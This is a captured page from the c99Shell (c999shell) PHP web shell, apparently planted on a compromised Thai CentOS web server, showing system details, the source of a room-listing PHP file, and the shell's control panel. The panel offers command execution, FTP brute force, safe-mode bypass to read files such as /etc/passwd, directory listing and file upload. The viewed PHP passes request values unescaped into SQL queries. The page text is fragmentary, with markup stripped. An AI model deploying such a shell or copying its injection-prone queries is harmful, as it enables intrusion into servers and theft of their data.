!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/   drwxr-xr-x
Free 52.6 GB of 127.8 GB (41.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     RoomCode.php (19.29 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
execQuery($query);
		$rs0 = $dbObj->fetchArray($result0);
		
		/**  Paging */
		$page = $_GET['page'];
		if( $page == "" ) { $page = 1; }
		
		/**  จำนวนข้อมูล ต่อ 1 หน้า  */
		$perpage = $_REQUEST['perpage'];
		if( $perpage == "" ) { $perpage = 10; }

		/**  Searching */
		$keyword = trim( $_REQUEST['keyword'] );
		$selectType = $_REQUEST['selectType'];
		
	
		

 ?>











ข้อมูลฝ่ายบริหาร : รายงานบุคลากร - จำนวนครุภัณฑ์ จำแนกตามรายหน่วยงาน - ข้อมูลครุภัณฑ์หน่วยงาน






  

    
      execQuery($query);
		$numrows = $dbObj->_numrows;
		
		/**  Paging  */
		$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
		$start = ( ($display * $limit) - $limit );
		/**  Paging  */
		
		if( $keyword != "" ) { // ใส่ Keyword
			if( $selectType != "" ) { // เลือกรายการใน List
				switch( $selectType ) {
					case 1 :
						if( isset($_GET['OrderBy']) ) {
							$query = " SELECT *  FROM $myTable  WHERE   ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' ) 
												AND  $myTableField1 LIKE '%$keyword%' 
												ORDER BY  $OrderBy  $ASCDESC ";
						} 
						elseif( !isset($_GET['OrderBy']) ) {
							$query = " SELECT *  FROM $myTable  WHERE   ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' ) 
												AND  $myTableField1 LIKE '%$keyword%' 
												ORDER BY  $myTalbleOrder  ASC ";
						}
					break;
					case 2 :
						if( isset($_GET['OrderBy']) ) {
							$query = " SELECT *  FROM $myTable  WHERE ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' ) 	AND  $myTableField2 LIKE '%$keyword%'  	ORDER BY  $OrderBy  $ASCDESC ";
						} 
						elseif( !isset($_GET['OrderBy']) ) {
							$query = " SELECT *  FROM $myTable  WHERE  ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' )  	AND  $myTableField2 LIKE '%$keyword%'   		ORDER BY  $myTalbleOrder  ASC ";
						}
					break;
					case 3 :
						if( isset($_GET['OrderBy']) ) {
							$query = " SELECT *  FROM $myTable  WHERE   ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' )   	AND  $myTableField3 LIKE '%$keyword%'  ORDER BY  $OrderBy  $ASCDESC ";
						} 
						elseif( !isset($_GET['OrderBy']) ) {
							$query = " SELECT *  FROM $myTable  WHERE    ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' )  	AND  $myTableField3 LIKE '%$keyword%'  	ORDER BY  $myTalbleOrder  ASC ";
						}
					break;
				} # switch
			} else {  // หาเฉพาะที่ใส่ Keyword
				if( isset($_GET['OrderBy']) ) {
					$query = " SELECT *  FROM $myTable  WHERE   ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' ) 
										ORDER BY  $OrderBy  $ASCDESC ";
				} 
				elseif( !isset($_GET['OrderBy']) ) {
					$query = " SELECT *  FROM $myTable  WHERE    ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' ) 
										ORDER BY  $myTalbleOrder  ASC ";
				}
			}
		} #if
		else {
			if( isset($_GET['OrderBy']) ) {
				$query = " SELECT *  FROM $myTable   ORDER BY  $OrderBy  $ASCDESC ";
			} 
			elseif( !isset($_GET['OrderBy']) ) {
				$query = " SELECT *  FROM $myTable   ORDER BY  $myTalbleOrder  ASC ";
			}
		}
		
		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);
    ?>
      

        

          

            
            

          

             ‹ ย้อนกลับ
            จำนวนข้อมูลต่อหน้า
              
            

          

            

              
              

                ค้นหา 
                  
                  
                  
              

              

            

          

            
               0 ) { ?>
              

                
                

                  ทั้งหมด: 
                    
                     รายการ
                   
                  

                

              fetchArray($result) ) { 
			
				if( $keyword != "" ) {
					$Room_code = eregi_replace( $keyword, "\\0", $rs['Room_code'] );
					$Room_name = eregi_replace( $keyword, "\\0", $rs['Room_name'] );
				} else {
					$Room_code = $rs['Room_code'];
					$Room_name = $rs['Room_name'];
				}
			
				$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";
          ?>
                freeresult($result1);
          ?>
                

                

                  No
                  
                     
                    
                     
                    เลขห้อง
                  
                     
                    
                     
                    ชื่อห้อง
                  
                     
                    
                     
                    ชนิดของห้อง
                  
                     
                    
                     
                    ความจุ(คน)
                  

                

                  
                  ","","")'>
                  
                  
                    
                 
                  ".$rs['Size'].""; else echo "".$rs['Size']."";?>
                  

                

              
              

                

                  
                     0 ) { ?>
                    

                      

                        
                        

                      

                        หน้า: 
                           1) {	
                            $previous = $display - 1;					
                    ?>
bool(false)




:: Command execute ::


Enter:  
Select: 
 






:: Shadow's tricks :D  ::



  

    
Useful Commands 
    

    

      

        
        
          
        
         
        
          

        Warning. Kernel may be alerted using higher levels 

    

    

  

   
Kernel Info: 

      
      
	  
	  
	  
	  
    

    







:: Preddy's tricks :D  ::



  

    
Php Safe-Mode Bypass (Read Files)
    


    

      

      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      

    

    

  

   
Php Safe-Mode Bypass (List Directories):     

      


      Dir:  

 eg: /etc/


    

    








 
:: Search ::
  - regexp 

 
:: Upload ::
 
[ Read-Only ]






:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]


:: Go Dir ::
 
:: Go File ::
 


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0056 ]--